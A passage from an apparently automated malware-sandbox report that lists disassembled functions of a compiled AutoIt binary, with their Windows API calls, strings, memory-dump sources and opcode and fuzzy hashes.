                                                                                                                                                                      • String ID: ComboBox$ListBox
                                                                                                                                                                      • API String ID: 372448540-1403004172
                                                                                                                                                                      • Opcode ID: 739e68bcaa7ce6e8853b768ed1ca9e7ec81a882bdfd2258a27690fcbf5cc9297
                                                                                                                                                                      • Instruction ID: 3a2c333636e33d0d3e6eebdc88d94545794f46888d8edfa114585d56de5047f9
                                                                                                                                                                      • Opcode Fuzzy Hash: 739e68bcaa7ce6e8853b768ed1ca9e7ec81a882bdfd2258a27690fcbf5cc9297
                                                                                                                                                                      • Instruction Fuzzy Hash: DF01F772A4111877CB16E6A0C986FFF73AC9F00300F25041AB846A7181DA155E08C375
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00396DAE, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __calloc_crt
                                                                                                                                                                      • String ID: @RC
                                                                                                                                                                      • API String ID: 3494438863-3900930862
                                                                                                                                                                      • Opcode ID: 5ceb37694394d0f5c9b88745fb9b0327c6eb8a80ae003ddc78504ea6ee1ac26c
                                                                                                                                                                      • Instruction ID: fba2cb47233da55791c5583f64f8c38fbe336678e9b1ed714d56a755263728da
                                                                                                                                                                      • Opcode Fuzzy Hash: 5ceb37694394d0f5c9b88745fb9b0327c6eb8a80ae003ddc78504ea6ee1ac26c
                                                                                                                                                                      • Instruction Fuzzy Hash: 80F0627170A617ABFB26EF58BD12A632799E745720B638477E610CE190EB3488818698
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003D51CA, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ClassName_wcscmp
                                                                                                                                                                      • String ID: #32770
                                                                                                                                                                      • API String ID: 2292705959-463685578
                                                                                                                                                                      • Opcode ID: ce45d38fecb2a19a13bd61586ff75fe10fc360161b7858c2a7dec97c03dc4434
                                                                                                                                                                      • Instruction ID: 266346e63970e0377ac3cf4bcf5c1daab131ae34998e270f9bf888be91940eff
                                                                                                                                                                      • Opcode Fuzzy Hash: ce45d38fecb2a19a13bd61586ff75fe10fc360161b7858c2a7dec97c03dc4434
                                                                                                                                                                      • Instruction Fuzzy Hash: 11E06873A0022C6BE720AA99AC49FA7F7ACEF407B1F00006BFD10D3140E5709A18CBE4
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003C81BC, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 003C81CA
                                                                                                                                                                        • Part of subcall function 00393598: _doexit.LIBCMT ref: 003935A2
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Message_doexit
                                                                                                                                                                      • String ID: AutoIt$Error allocating memory.
                                                                                                                                                                      • API String ID: 1993061046-4017498283
                                                                                                                                                                      • Opcode ID: ed4b699bdf84eb4c5a5cdb7ddb8c0c37897e335d1e0ba45929814791e8a58661
                                                                                                                                                                      • Instruction ID: 8c1e35dcf8d83dfb40ae18f989a4afc6d46552efc57b8af1a6a39111c7964e83
                                                                                                                                                                      • Opcode Fuzzy Hash: ed4b699bdf84eb4c5a5cdb7ddb8c0c37897e335d1e0ba45929814791e8a58661
                                                                                                                                                                      • Instruction Fuzzy Hash: D1D05B323C531836D61633A46C07FC576884F05B51F544026BB0CA95D38ED69D8182DD
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003AB511, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 003AB564: _memset.LIBCMT ref: 003AB571
                                                                                                                                                                        • Part of subcall function 00390B84: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,003AB540,?,?,?,0037100A), ref: 00390B89
                                                                                                                                                                      • IsDebuggerPresent.KERNEL32(?,?,?,0037100A), ref: 003AB544
                                                                                                                                                                      • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0037100A), ref: 003AB553
                                                                                                                                                                      Strings
                                                                                                                                                                      • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 003AB54E
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                                                                                                                                      • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                                                                      • API String ID: 3158253471-631824599
                                                                                                                                                                      • Opcode ID: 855431acb775918db9b1ca8a349d2602e7290902d0258571360e0d26afb1c89a
                                                                                                                                                                      • Instruction ID: 193ff444916e4dbb20c809125543f00807d47c9857e63346d6376867f49bd292
                                                                                                                                                                      • Opcode Fuzzy Hash: 855431acb775918db9b1ca8a349d2602e7290902d0258571360e0d26afb1c89a
                                                                                                                                                                      • Instruction Fuzzy Hash: 25E0ED746007118FD726DF28D504752BBE4EF05754F05896DE846C6652E7B8D444CB61
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003D9B6D, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetTempPathW.KERNEL32(00000104,?), ref: 003D9B82
                                                                                                                                                                      • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 003D9B99
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Temp$FileNamePath
                                                                                                                                                                      • String ID: aut
                                                                                                                                                                      • API String ID: 3285503233-3010740371
                                                                                                                                                                      • Opcode ID: 77a3241e78a4f9f213c1ec52370939e9a57d4a69124125c0f1d265d2857e7447
                                                                                                                                                                      • Instruction ID: ed8f807caa34ac1bbd3eb785ab4ba98296df9c6fde9b945ca5c1a2052a5b0487
                                                                                                                                                                      • Opcode Fuzzy Hash: 77a3241e78a4f9f213c1ec52370939e9a57d4a69124125c0f1d265d2857e7447
                                                                                                                                                                      • Instruction Fuzzy Hash: C0D05E7954030DBFDB10AB94EC0EFAA772CEB04700F4046A2BE54D11A2DEB4A5A8CB95
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003F5BEB, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 003F5BF5
                                                                                                                                                                      • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 003F5C08
                                                                                                                                                                        • Part of subcall function 003D54E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 003D555E
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FindMessagePostSleepWindow
                                                                                                                                                                      • String ID: Shell_TrayWnd
                                                                                                                                                                      • API String ID: 529655941-2988720461
                                                                                                                                                                      • Opcode ID: 43214162bf236acfba67e712f54ba16c55410194bbe2b3b13065171872de17e5
                                                                                                                                                                      • Instruction ID: 09cb6e00a70b5602de8e68f04a2d5ac639380d9a5d4e9ca9ddb329411deefae5
                                                                                                                                                                      • Opcode Fuzzy Hash: 43214162bf236acfba67e712f54ba16c55410194bbe2b3b13065171872de17e5
                                                                                                                                                                      • Instruction Fuzzy Hash: 40D0C7313843117BD775A770BC0BFA76614AF01751F1008257A55992D0D9E45410C654
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003F5C1F, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 003F5C35
                                                                                                                                                                      • PostMessageW.USER32(00000000), ref: 003F5C3C
                                                                                                                                                                        • Part of subcall function 003D54E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 003D555E
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FindMessagePostSleepWindow
                                                                                                                                                                      • String ID: Shell_TrayWnd
                                                                                                                                                                      • API String ID: 529655941-2988720461
                                                                                                                                                                      • Opcode ID: 598ca9230cc8b1d24052e5964d38c104758e0dd270a7721dacc15d34f793b04e
                                                                                                                                                                      • Instruction ID: 33fb73eedaf0dea2c829f51fb82d556c7edf441e4006aa18d9b88da3f61dc49f
                                                                                                                                                                      • Opcode Fuzzy Hash: 598ca9230cc8b1d24052e5964d38c104758e0dd270a7721dacc15d34f793b04e
                                                                                                                                                                      • Instruction Fuzzy Hash: C6D0C7313C43117BE775A770BC0BFA76614AB05751F1008257A55D92D0D9E45410C659
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%